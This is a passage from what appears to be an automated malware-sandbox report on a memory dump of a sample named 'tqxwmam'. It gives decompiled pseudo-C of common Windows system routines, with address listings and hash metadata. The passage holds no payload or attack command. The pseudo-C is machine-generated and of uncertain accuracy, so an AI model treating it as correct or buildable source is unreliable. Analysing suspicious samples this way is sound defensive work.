								E00B07016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00AC9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E00B069A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0xb77c04 != 0) {
						_t118 = _v12;
						_t120 = E00B0A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0xb77bd8;
						if( *0xb77bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00AC95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00AC99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E00B03540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00A8B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00ACAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0xb78474 - 3;
										if( *0xb78474 != 3) {
											 *0xb779dc =  *0xb779dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E00AA7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E00AA7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E00B07016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0xb78708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0xb77b00; // 0x0
							asm("ror esi, cl");
							 *0xb7b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00AC95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00A97F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                    0x00ab03f1
                                                    0x00ab03f7
                                                    0x00ab03f9
                                                    0x00ab03fb
                                                    0x00ab03fd
                                                    0x00ab0400
                                                    0x00ab040a
                                                    0x00af4c7a
                                                    0x00ab0537
                                                    0x00ab0547
                                                    0x00ab0410
                                                    0x00ab0410
                                                    0x00ab0414
                                                    0x00ab0417
                                                    0x00ab041a
                                                    0x00ab0421
                                                    0x00ab0424
                                                    0x00ab042b
                                                    0x00ab043b
                                                    0x00ab043e
                                                    0x00ab043f
                                                    0x00ab043f
                                                    0x00ab0446
                                                    0x00ab0449
                                                    0x00ab044c
                                                    0x00ab044f
                                                    0x00ab0459
                                                    0x00af4c8d
                                                    0x00ab045f
                                                    0x00ab045f
                                                    0x00ab045f
                                                    0x00ab0467
                                                    0x00af4c97
                                                    0x00af4c9d
                                                    0x00af4ca4
                                                    0x00af4caa
                                                    0x00af4caf
                                                    0x00af4cb1
                                                    0x00af4cc3
                                                    0x00af4cb3
                                                    0x00af4cbc
                                                    0x00af4cbc
                                                    0x00af4cc8
                                                    0x00af4ccb
                                                    0x00af4cd7
                                                    0x00af4cda
                                                    0x00af4cdf
                                                    0x00af4cdf
                                                    0x00af4ccb
                                                    0x00af4ca4
                                                    0x00ab046d
                                                    0x00ab046f
                                                    0x00ab046f
                                                    0x00ab0471
                                                    0x00ab0476
                                                    0x00ab047a
                                                    0x00ab047b
                                                    0x00ab0483
                                                    0x00ab0489
                                                    0x00ab048d
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4ce9
                                                    0x00af4cef
                                                    0x00af4d22
                                                    0x00af4d22
                                                    0x00000000
                                                    0x00af4d22
                                                    0x00af4cf1
                                                    0x00af4cf7
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4cf9
                                                    0x00af4cff
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4d05
                                                    0x00af4d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4d0d
                                                    0x00af4d0f
                                                    0x00af4d14
                                                    0x00af4d16
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4d1c
                                                    0x00af4d1c
                                                    0x00ab0499
                                                    0x00ab0535
                                                    0x00ab0535
                                                    0x00000000
                                                    0x00ab0535
                                                    0x00ab04a6
                                                    0x00af4d2c
                                                    0x00af4d37
                                                    0x00af4d39
                                                    0x00af4d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4d41
                                                    0x00af4d48
                                                    0x00ab0527
                                                    0x00ab052b
                                                    0x00ab052d
                                                    0x00ab0530
                                                    0x00ab0530
                                                    0x00000000
                                                    0x00ab052b
                                                    0x00af4d4e
                                                    0x00ab04ac
                                                    0x00ab04ac
                                                    0x00ab04af
                                                    0x00ab04b2
                                                    0x00ab04b7
                                                    0x00ab04b9
                                                    0x00ab04bb
                                                    0x00ab04bd
                                                    0x00ab04bf
                                                    0x00ab04c5
                                                    0x00ab04c9
                                                    0x00af4d53
                                                    0x00af4d59
                                                    0x00af4db9
                                                    0x00af4dba
                                                    0x00af4dbf
                                                    0x00af4dc2
                                                    0x00af4dc4
                                                    0x00af4dc7
                                                    0x00af4dce
                                                    0x00000000
                                                    0x00af4dce
                                                    0x00af4d5b
                                                    0x00af4d61
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4d63
                                                    0x00af4d69
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4d6b
                                                    0x00af4d6e
                                                    0x00af4d74
                                                    0x00af4d76
                                                    0x00af4d7c
                                                    0x00af4d7e
                                                    0x00af4d84
                                                    0x00af4d89
                                                    0x00af4d8c
                                                    0x00af4d8d
                                                    0x00af4d92
                                                    0x00af4d95
                                                    0x00af4d96
                                                    0x00af4d98
                                                    0x00af4d9a
                                                    0x00af4d9f
                                                    0x00af4da4
                                                    0x00af4da6
                                                    0x00af4da8
                                                    0x00af4daf
                                                    0x00af4db1
                                                    0x00af4db1
                                                    0x00af4daf
                                                    0x00af4da6
                                                    0x00af4d84
                                                    0x00af4d7c
                                                    0x00000000
                                                    0x00af4d74
                                                    0x00ab04d6
                                                    0x00af4de1
                                                    0x00ab04dc
                                                    0x00ab04dc
                                                    0x00ab04dc
                                                    0x00ab04e4
                                                    0x00af4deb
                                                    0x00af4df1
                                                    0x00af4df8
                                                    0x00af4dfe
                                                    0x00af4e03
                                                    0x00af4e05
                                                    0x00af4e17
                                                    0x00af4e07
                                                    0x00af4e10
                                                    0x00af4e10
                                                    0x00af4e1c
                                                    0x00af4e1f
                                                    0x00af4e35
                                                    0x00af4e35
                                                    0x00af4e1f
                                                    0x00af4df8
                                                    0x00ab04f1
                                                    0x00ab04fa
                                                    0x00af4e3f
                                                    0x00af4e47
                                                    0x00af4e5b
                                                    0x00af4e61
                                                    0x00af4e67
                                                    0x00af4e69
                                                    0x00af4e71
                                                    0x00af4e73
                                                    0x00ab0500
                                                    0x00ab0500
                                                    0x00ab0500
                                                    0x00ab04fa
                                                    0x00ab0508
                                                    0x00ab051d
                                                    0x00ab051d
                                                    0x00ab051f
                                                    0x00ab0524
                                                    0x00000000
                                                    0x00ab0524
                                                    0x00ab0515
                                                    0x00ab0517
                                                    0x00af4e7a
                                                    0x00af4e7c
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4e85
                                                    0x00000000
                                                    0x00af4e85
                                                    0x00000000
                                                    0x00ab0517

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c4e97898fba323a94025b39b5f4f07a126dec559b090543ade98b3a7dd98645
                                                    • Instruction ID: 624c4f9ebab4c8f497c3bc44e12a08ed6f1ecf45254710cb69c8322aa581ed42
                                                    • Opcode Fuzzy Hash: 3c4e97898fba323a94025b39b5f4f07a126dec559b090543ade98b3a7dd98645
                                                    • Instruction Fuzzy Hash: 8A91F631E042189FDB319BA8CC45FFF7BA8AB05714F154265FA11AB2E2DB749D40CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB6A60 Relevance: .2, Instructions: 227COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 66%
                                                    			E00AB6A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0xb7d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E00AC9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0xb76908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E00ACCF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E00ACCF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E00ACD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E00ACB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E00ACAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E00ACD000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E00ACAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                    0x00ab6a6f
                                                    0x00ab6a72
                                                    0x00ab6a78
                                                    0x00ab6a7c
                                                    0x00ab6a7f
                                                    0x00ab6a87
                                                    0x00af8049
                                                    0x00af8049
                                                    0x00af804e
                                                    0x00af804f
                                                    0x00af8057
                                                    0x00af805c
                                                    0x00000000
                                                    0x00ab6a8d
                                                    0x00ab6a92
                                                    0x00ab6a92
                                                    0x00ab6a94
                                                    0x00ab6a99
                                                    0x00ab6a9c
                                                    0x00ab6a9f
                                                    0x00ab6aa2
                                                    0x00ab6aaa
                                                    0x00ab6ab0
                                                    0x00af7eae
                                                    0x00af7eb4
                                                    0x00af7eb9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7ebf
                                                    0x00af7ebf
                                                    0x00af7ebf
                                                    0x00af7ec1
                                                    0x00af7ec6
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7ece
                                                    0x00af7edb
                                                    0x00af7ee5
                                                    0x00af7ee7
                                                    0x00af7ee7
                                                    0x00af7edd
                                                    0x00af7edd
                                                    0x00af7edd
                                                    0x00af7eea
                                                    0x00af7ed0
                                                    0x00af7ed0
                                                    0x00af7ed3
                                                    0x00af7ed3
                                                    0x00af7eec
                                                    0x00af7ef8
                                                    0x00af7f00
                                                    0x00af7f07
                                                    0x00af7f0a
                                                    0x00af7f19
                                                    0x00af7f1b
                                                    0x00af7f23
                                                    0x00af7f25
                                                    0x00af7f28
                                                    0x00af7f2e
                                                    0x00af7f31
                                                    0x00af7f34
                                                    0x00af7f37
                                                    0x00af7f3c
                                                    0x00000000
                                                    0x00af7f3e
                                                    0x00af7f3e
                                                    0x00af7f41
                                                    0x00ab6b35
                                                    0x00ab6b38
                                                    0x00ab6b44
                                                    0x00ab6b4c
                                                    0x00ab6b4e
                                                    0x00ab6b51
                                                    0x00ab6b69
                                                    0x00ab6b69
                                                    0x00af7f3c
                                                    0x00af8046
                                                    0x00000000
                                                    0x00af8046
                                                    0x00ab6abc
                                                    0x00ab6aca
                                                    0x00af7f49
                                                    0x00ab6b13
                                                    0x00ab6b13
                                                    0x00ab6b16
                                                    0x00ab6b1e
                                                    0x00af7fe7
                                                    0x00af7fea
                                                    0x00af7fed
                                                    0x00af7ff0
                                                    0x00af7ff2
                                                    0x00af7ff4
                                                    0x00af7ffa
                                                    0x00000000
                                                    0x00000000
                                                    0x00af8000
                                                    0x00af8003
                                                    0x00af8006
                                                    0x00af8009
                                                    0x00af800b
                                                    0x00af800d
                                                    0x00af8010
                                                    0x00af801f
                                                    0x00000000
                                                    0x00000000
                                                    0x00af8025
                                                    0x00ab6b2f
                                                    0x00ab6b2f
                                                    0x00ab6b32
                                                    0x00000000
                                                    0x00ab6b32
                                                    0x00ab6b26
                                                    0x00af8030
                                                    0x00af803a
                                                    0x00af803c
                                                    0x00af803c
                                                    0x00af8032
                                                    0x00af8032
                                                    0x00af8032
                                                    0x00af803f
                                                    0x00ab6b2c
                                                    0x00ab6b2c
                                                    0x00ab6b2c
                                                    0x00000000
                                                    0x00ab6b26
                                                    0x00ab6ad0
                                                    0x00ab6ad6
                                                    0x00ab6ade
                                                    0x00ab6ae0
                                                    0x00ab6ae0
                                                    0x00ab6ae5
                                                    0x00af7f53
                                                    0x00ab6aeb
                                                    0x00ab6aeb
                                                    0x00ab6aeb
                                                    0x00ab6af3
                                                    0x00af7f5e
                                                    0x00af7f61
                                                    0x00af7f68
                                                    0x00af7f69
                                                    0x00af7f6b
                                                    0x00af7f70
                                                    0x00af7f71
                                                    0x00af7f76
                                                    0x00af7f77
                                                    0x00af7f7c
                                                    0x00af7f86
                                                    0x00af7f88
                                                    0x00af7f8d
                                                    0x00af7f92
                                                    0x00af7f97
                                                    0x00af7f98
                                                    0x00af7f99
                                                    0x00af7f9a
                                                    0x00af7f9f
                                                    0x00af7fa0
                                                    0x00af7fa5
                                                    0x00af7faa
                                                    0x00af7faa
                                                    0x00af7faf
                                                    0x00af7fdc
                                                    0x00af7fdf
                                                    0x00000000
                                                    0x00af7fb1
                                                    0x00af7fb1
                                                    0x00af7fb3
                                                    0x00af7fb8
                                                    0x00af7fd4
                                                    0x00af7fd4
                                                    0x00000000
                                                    0x00af7fd4
                                                    0x00af7fba
                                                    0x00af7fbc
                                                    0x00af7fc2
                                                    0x00af7fc4
                                                    0x00af7fc4
                                                    0x00af7fc7
                                                    0x00af7fcb
                                                    0x00af7fcc
                                                    0x00af7fd1
                                                    0x00000000
                                                    0x00af7fd1
                                                    0x00ab6b04
                                                    0x00ab6b04
                                                    0x00ab6b0b
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab6b11
                                                    0x00000000
                                                    0x00ab6b11
                                                    0x00ab6af3

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a35b1443b4f7163d4837c03bebd125096860b4a84e51db66b1d19a7c00c31b6
                                                    • Instruction ID: 28a595dc8d16f91810c1d640e849a39aa3c9a598811967f73ac379c9d41fd1b7
                                                    • Opcode Fuzzy Hash: 1a35b1443b4f7163d4837c03bebd125096860b4a84e51db66b1d19a7c00c31b6
                                                    • Instruction Fuzzy Hash: 01815C71A002199FDB24CF98C981BFEBBB5EF08350F158069EA49EB241D735AD45CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8C600 Relevance: .2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00A8C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0xb7d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E00A96D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E00ACB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0xb77b9c; // 0x0
					_t74 = L00AA4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E00AC9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L00AA77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E00ACF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E00AC13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L00AA77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E00AC9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                    0x00a8c608
                                                    0x00a8c615
                                                    0x00a8c625
                                                    0x00a8c62d
                                                    0x00a8c635
                                                    0x00a8c640
                                                    0x00a8c680
                                                    0x00a8c687
                                                    0x00a8c688
                                                    0x00a8c689
                                                    0x00a8c694
                                                    0x00a8c694
                                                    0x00a8c642
                                                    0x00a8c64a
                                                    0x00a8c697
                                                    0x00af7a25
                                                    0x00af7a2b
                                                    0x00af7a2e
                                                    0x00af7a30
                                                    0x00af7bea
                                                    0x00af7bea
                                                    0x00000000
                                                    0x00af7bea
                                                    0x00af7a36
                                                    0x00af7a43
                                                    0x00af7a48
                                                    0x00af7a4c
                                                    0x00af7a4e
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7a58
                                                    0x00af7a5a
                                                    0x00af7a5b
                                                    0x00af7a5c
                                                    0x00af7a5d
                                                    0x00af7a63
                                                    0x00af7a64
                                                    0x00af7a6a
                                                    0x00af7a6c
                                                    0x00af7a6e
                                                    0x00af79cb
                                                    0x00af79cb
                                                    0x00af79ce
                                                    0x00af79d0
